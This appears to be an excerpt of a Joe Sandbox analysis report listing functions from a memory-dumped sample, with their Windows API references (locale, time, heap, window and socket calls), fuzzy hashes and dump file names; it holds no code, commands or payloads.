Instruction Fuzzy Hash: C1F027727043441BD7206B25AC01ABB72E8FBC4315F04442AF78AC7342DE755905EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C483E0 Relevance: 3.0, APIs: 2, Instructions: 18windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 00C483EB
ShowWindow.USER32(00000006), ref: 00C48405

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: IconicShowWindow
String ID:
API String ID: 3061500023-0
Opcode ID: a7e962a049e5276cdbcc2f2d7088c66488bdb7aebc28078ad06beae535626d76
Instruction ID: af474c33b05af10b236dd1f6f843973e5345d1a442fca630654043ead1b71f21
Opcode Fuzzy Hash: a7e962a049e5276cdbcc2f2d7088c66488bdb7aebc28078ad06beae535626d76
Instruction Fuzzy Hash: CAD05EA02452019BEB111B31BD2476E7BA6FB17300F089020FAD5C3271DB328919EA28

Uniqueness

Uniqueness Score: -1.00%

Function 00CDC530 Relevance: 2.2, Strings: 1, Instructions: 979COMMON

Download Yara Rule

Strings

G, xrefs: 00CDD250

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 3d2720c51b1ac3ebbb892162c0a8750d87942e7e3116b71a0c1296774eec8d59
Instruction ID: 26b495f29586663b7c58b52b2f66b347b4770c331989d80c4da63cb4422f0280
Opcode Fuzzy Hash: 3d2720c51b1ac3ebbb892162c0a8750d87942e7e3116b71a0c1296774eec8d59
Instruction Fuzzy Hash: F0920276A083509FD354CF19C89075EF7E2BBC8314F1A892EE998A7350CB74EC518B86

Uniqueness

Uniqueness Score: -1.00%

Function 00CDB3F0 Relevance: 2.0, Strings: 1, Instructions: 713COMMON

Download Yara Rule

Strings

gj, xrefs: 00CDB5FF

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 10e2eb673f9f8bfc020a3c13c380787e2bb702bd605fb65cdb14f14e3086758e
Instruction ID: 465080afc5611b826dc299cabf931d6c58435a7906671d846ad84193d2091fc7
Opcode Fuzzy Hash: 10e2eb673f9f8bfc020a3c13c380787e2bb702bd605fb65cdb14f14e3086758e
Instruction Fuzzy Hash: 3172BEB5A093408FC358CF29C490A5AFBE2BFC8314F59892EE5D9D7351DB71A8548F82

Uniqueness

Uniqueness Score: -1.00%

Function 00C4D000 Relevance: 1.9, APIs: 1, Instructions: 437timeCOMMON

Download Yara Rule

APIs

GetCaretBlinkTime.USER32 ref: 00C4D573

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: BlinkCaretTime
String ID:
API String ID: 1096504186-0
Opcode ID: 38b2f5d1350f083aace0620fa42e4c2e82e0acffc400d56098e88728b62a4fbc
Instruction ID: 15202797d8c8e7fbdbcc381e5116f87b674d6ee263012e24b878689e22c68c97
Opcode Fuzzy Hash: 38b2f5d1350f083aace0620fa42e4c2e82e0acffc400d56098e88728b62a4fbc
Instruction Fuzzy Hash: 26F1A471D083C86AEB31AF34EC46BDE3F916F51308F084129FD8D5A293D6B25A98D752

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8490 Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00CA84C3

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 983c91c31e11f8fd663db0fb3e1c61ef21fecb19e43459decb6e3baff84d5bd3
Instruction ID: bcba68134fdbf1c14e07bf49eec37a489907b72b47f3b6348fd753578b8692e6
Opcode Fuzzy Hash: 983c91c31e11f8fd663db0fb3e1c61ef21fecb19e43459decb6e3baff84d5bd3
Instruction Fuzzy Hash: 995180716083859FC310DF69D881A5FFBE5BF99304F04892DF99997342E631E918CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CDEE35 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CDEE4B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 33cf8a5e346432fefbfa688353c29f9f8d49a57dae2af153026ef50feebfb494
Instruction ID: 4a66608bb73940b3f8c34c9b8757b6ec4133daf976c935bfaaaf32244d2e34e7
Opcode Fuzzy Hash: 33cf8a5e346432fefbfa688353c29f9f8d49a57dae2af153026ef50feebfb494
Instruction Fuzzy Hash: 87516DB5A013198FEB25CF59D8857AABBF0FB48310F24816AD515EB361D3B4AE40CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D041E6 Relevance: 1.6, APIs: 1, Instructions: 116timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CF4716: HeapFree.KERNEL32(00000000,00000000,?,00CF77DA,?,00000000,?,?,00CF747A,?,00000007,?,?,00CF7FA8,?,?), ref: 00CF472C
Part of subcall function 00CF4716: GetLastError.KERNEL32(?,?,00CF77DA,?,00000000,?,?,00CF747A,?,00000007,?,?,00CF7FA8,?,?), ref: 00CF4737

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00D0467A,00000000,00C64E79), ref: 00D04258

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3335090040-0
Opcode ID: 9baae5ff10224c10812d1ef2ba034851f796590596eaf55aa30fa0dcbfe4d080
Instruction ID: 3214fd4cc0699036a83d4f7a83d7b2bb7870ee1a497231ac2f14be2ab4013ec4
Opcode Fuzzy Hash: 9baae5ff10224c10812d1ef2ba034851f796590596eaf55aa30fa0dcbfe4d080
Instruction Fuzzy Hash: 8231A2B1D00225ABCB10AFA5DC02B9E7FB9EF05350B154066F708E72A1D7709A60DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3417 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

0, xrefs: 00CE35A5

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 3e810b3520dd06455dd6c0a9205763bb9b69d8a139ed03f5f0360defb7bcbf99
Instruction ID: c5ed825be07dcc19421a888ee70e9dd07ec3590aff3988f6e286246f132efdd2
Opcode Fuzzy Hash: 3e810b3520dd06455dd6c0a9205763bb9b69d8a139ed03f5f0360defb7bcbf99
Instruction Fuzzy Hash: 64C1CDB0A006C68FCB25CF6AC59CA7ABBB5BB45310F144619E8A69B391C730FF45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8F1E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00CF3742: GetLastError.KERNEL32(?,?,00CE60D8,?,?,?,?,00CEE2B7,00CEE284,?,?,?,?,?,00CEE284,?), ref: 00CF3746
Part of subcall function 00CF3742: SetLastError.KERNEL32(00000000,00CEE284,?,?,?,?,?,00CEE284,?,00000000,?,00000003,00CE1B8B), ref: 00CF37E8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF8F72

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ebc8434c12bfe83e4facfc1e42c0da8f533ec5412eaeaea636cab282b17813ed
Instruction ID: df25ab4bf84c322c49519f9583f1979055bf1b493aa1ad6131eae9329f62de6b
Opcode Fuzzy Hash: ebc8434c12bfe83e4facfc1e42c0da8f533ec5412eaeaea636cab282b17813ed
Instruction Fuzzy Hash: 9021B37261520AAFDB68AA65DC41BBB73ADEF44310B10007AFF05C6281EB34EE04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2644 Relevance: 1.6, Strings: 1, Instructions: 322COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00CE27DC

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 6f340a814d3e9e6cdb1b085a7f4886c065c5fbe16e981b855bf0e42f37278e46
Instruction ID: b10ae10004d1de879b579fefb6a79ca03866e5f84ef8fb5d1641975ace2170f2
Opcode Fuzzy Hash: 6f340a814d3e9e6cdb1b085a7f4886c065c5fbe16e981b855bf0e42f37278e46
Instruction Fuzzy Hash: 25B1B171A006898BCB38CF6AC980BBEB7FDAF54310F14561DE466E7290D730AE46DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CF903E Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00CF3742: GetLastError.KERNEL32(?,?,00CE60D8,?,?,?,?,00CEE2B7,00CEE284,?,?,?,?,?,00CEE284,?), ref: 00CF3746
Part of subcall function 00CF3742: SetLastError.KERNEL32(00000000,00CEE284,?,?,?,?,?,00CEE284,?,00000000,?,00000003,00CE1B8B), ref: 00CF37E8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF9092

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1b582e59f0fdcdbb9af468a4f555a290fb90eb70955c91b6430f5210e861939b
Instruction ID: d6774b436c03194040e1dd66775d208bac627945739d40c94147e686fd5b6c46
Opcode Fuzzy Hash: 1b582e59f0fdcdbb9af468a4f555a290fb90eb70955c91b6430f5210e861939b
Instruction Fuzzy Hash: 1F11C67261120BABDB64AB24DD46BBA77ACEF45310B10407AEA05D7241EF34ED04D751

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8BD1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00CF3742: GetLastError.KERNEL32(?,?,00CE60D8,?,?,?,?,00CEE2B7,00CEE284,?,?,?,?,?,00CEE284,?), ref: 00CF3746
Part of subcall function 00CF3742: SetLastError.KERNEL32(00000000,00CEE284,?,?,?,?,?,00CEE284,?,00000000,?,00000003,00CE1B8B), ref: 00CF37E8

EnumSystemLocalesW.KERNEL32(00CF8C6C,00000001,00000000,?,?,?,00CF8A5B,00000000), ref: 00CF8C43

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 0cc76f55ac4768198e5d50c38f31cc0bb40a42a99068bc25d69e6c82ea9db09f
Instruction ID: 3d5eea2052d806201aba8c90b18cd36f09156477844d46c79575a2caee214cbf
Opcode Fuzzy Hash: 0cc76f55ac4768198e5d50c38f31cc0bb40a42a99068bc25d69e6c82ea9db09f
Instruction Fuzzy Hash: 30114C3B2007099FDB189F39C8916BAB7A2FF80758B14443CE64687B40D7717907CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CF91EB Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00CF3742: GetLastError.KERNEL32(?,?,00CE60D8,?,?,?,?,00CEE2B7,00CEE284,?,?,?,?,?,00CEE284,?), ref: 00CF3746
Part of subcall function 00CF3742: SetLastError.KERNEL32(00000000,00CEE284,?,?,?,?,?,00CEE284,?,00000000,?,00000003,00CE1B8B), ref: 00CF37E8

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CF8E88,00000000,00000000,?), ref: 00CF9217

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 04ea060b9e31301df22669233a007e9f6ff3dda5214d51ff10d13eadec073a5a
Instruction ID: 1840db762884393c53640fcd9a219d97fdfb4d1d839e0083d384274fd045636c
Opcode Fuzzy Hash: 04ea060b9e31301df22669233a007e9f6ff3dda5214d51ff10d13eadec073a5a
Instruction Fuzzy Hash: 79F02837A00119BBDF685B24CC06BBA7768EB80754F154428EE16A3180EA74FF01C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 00C643C0 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00D0E938,00000000,00000001,00D0E928), ref: 00C64405

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 9141ae43df3d115bbd376f8add42505142f67523d851e36799484e7c2da01610
Instruction ID: 52519f4fb5799599ad5651f8b15aa7c7a4217044b19f4b7d167e3285e15f7b43
Opcode Fuzzy Hash: 9141ae43df3d115bbd376f8add42505142f67523d851e36799484e7c2da01610
Instruction Fuzzy Hash: B1018F74704300AFDA28AB24EC8BB2A37B5AB58701F40441DF54A8B391DA31E914CA63

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8EBF Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00CF3742: GetLastError.KERNEL32(?,?,00CE60D8,?,?,?,?,00CEE2B7,00CEE284,?,?,?,?,?,00CEE284,?), ref: 00CF3746
Part of subcall function 00CF3742: SetLastError.KERNEL32(00000000,00CEE284,?,?,?,?,?,00CEE284,?,00000000,?,00000003,00CE1B8B), ref: 00CF37E8

EnumSystemLocalesW.KERNEL32(00CF8F1E,00000001,?,?,?,?,00CF8A1F,?), ref: 00CF8F09

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b4d9a3db55694f49b0ad7fc8fcf754c144bd5141a0fa6de6ac982e63802db2a5
Instruction ID: 535dff0676f3e2ea0aecc589f219e069b3fd2945970a1b51977eac39b696fe88
Opcode Fuzzy Hash: b4d9a3db55694f49b0ad7fc8fcf754c144bd5141a0fa6de6ac982e63802db2a5
Instruction Fuzzy Hash: 87F0F63A3007086FDB246F75DC85A7ABB92FF80768B15442DFA468B680DA71AD06DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C896E0 Relevance: 1.5, APIs: 1, Instructions: 37timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,?,?,00C64BB4,?), ref: 00C896F6

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 3435b9fe56ab1feb2ce5e1695aecd60d5c63bd268f94baf284a72083a1f57ecd
Instruction ID: 4fff780f0dcdd8d9d07ded7cd6988aa7cf1473d911d7818485b0d1be0c77cb22
Opcode Fuzzy Hash: 3435b9fe56ab1feb2ce5e1695aecd60d5c63bd268f94baf284a72083a1f57ecd
Instruction Fuzzy Hash: F50195B05047119FC364DF2AD45523AB7F1BF48711F108A1EB8EA86690E338E944DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF35C5 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00CF36B3: EnterCriticalSection.KERNEL32(?,?,00CF4AA5,00000000,00D3F7C8,0000000C,00CF4A5D,?,?,00CF62F7,?,?,00CF38E0,00000001,00000364,?), ref: 00CF36C2

EnumSystemLocalesW.KERNEL32(00CF35B8,00000001,00D3F6C8,0000000C,00CF2D1C,?), ref: 00CF35FD

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d885203e79fdbfdcf8b58a98f070192ccaf51382abe818aa9136001a126b4b8f
Instruction ID: dfadb6da0316a7cebd771b33d134dc7666f076520c92e05c43c3ad4597b94038
Opcode Fuzzy Hash: d885203e79fdbfdcf8b58a98f070192ccaf51382abe818aa9136001a126b4b8f
Instruction Fuzzy Hash: 2BF03776A00248EFD710EFA8E902BAC7BF1FB45720F10412AF610DB3A0CB755A049F61

Uniqueness

Uniqueness Score: -1.00%

Function 00C77210 Relevance: 1.5, APIs: 1, Instructions: 31networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C65810: WSAAsyncSelect.WS2_32(?,00000000,00008005,0000003F), ref: 00C65854

recv.WS2_32(?,?,00000001,00000002), ref: 00C77253

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AsyncSelectrecv
String ID:
API String ID: 3881473523-0
Opcode ID: bdd5dde9509f748634796472f1e5f057308b4236bcee6d77b122b3a18243740b
Instruction ID: 56e5ebb830812c524228a97b575ea29fa69d13cd1375ac8f8b7126e537650490
Opcode Fuzzy Hash: bdd5dde9509f748634796472f1e5f057308b4236bcee6d77b122b3a18243740b
Instruction Fuzzy Hash: 3BF09078908350ABEB259B24BC46B6DBBE05F49700F48888DF9D91B2D2C6215948D772

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8FF3 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00CF3742: GetLastError.KERNEL32(?,?,00CE60D8,?,?,?,?,00CEE2B7,00CEE284,?,?,?,?,?,00CEE284,?), ref: 00CF3746
